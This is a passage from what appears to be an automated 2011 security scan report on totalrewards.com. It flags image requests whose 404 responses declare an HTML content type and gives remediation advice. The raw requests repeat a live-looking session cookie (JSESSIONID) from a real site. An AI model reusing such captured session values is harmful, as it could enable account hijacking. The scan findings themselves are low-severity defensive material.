GET /images/presentation/chinese/total_rewards/playforfun.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:52 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
GET /images/presentation/chinese/total_rewards/playforfun_over.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:52 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
GET /images/presentation/chinese/total_rewards/rewards_horseshoe.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:54 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
GET /images/presentation/chinese/total_rewards/signout.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:54 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
GET /images/presentation/chinese/total_rewards/signout_over.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:54 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
GET /images/rewards_horseshoe_over.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:54 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
HTTP/1.1 200 OK Date: Wed, 16 Mar 2011 12:09:18 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 124708
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /images/presentation/chinese/total_rewards/go_over.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:56 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /images/presentation/chinese/total_rewards/myaccount.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:52 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /images/presentation/chinese/total_rewards/myaccount_over.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:51 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /images/presentation/chinese/total_rewards/myoffers.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:52 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /images/presentation/chinese/total_rewards/myoffers_over.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:52 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /images/presentation/chinese/total_rewards/playforfun.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:52 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /images/presentation/chinese/total_rewards/playforfun_over.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:52 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /images/presentation/chinese/total_rewards/rewards_horseshoe.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:54 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /images/presentation/chinese/total_rewards/signout.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:54 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /images/presentation/chinese/total_rewards/signout_over.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:54 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /images/rewards_horseshoe_over.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:54 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
...
Report generated by xss.cx at Wed Mar 16 07:31:40 CDT 2011.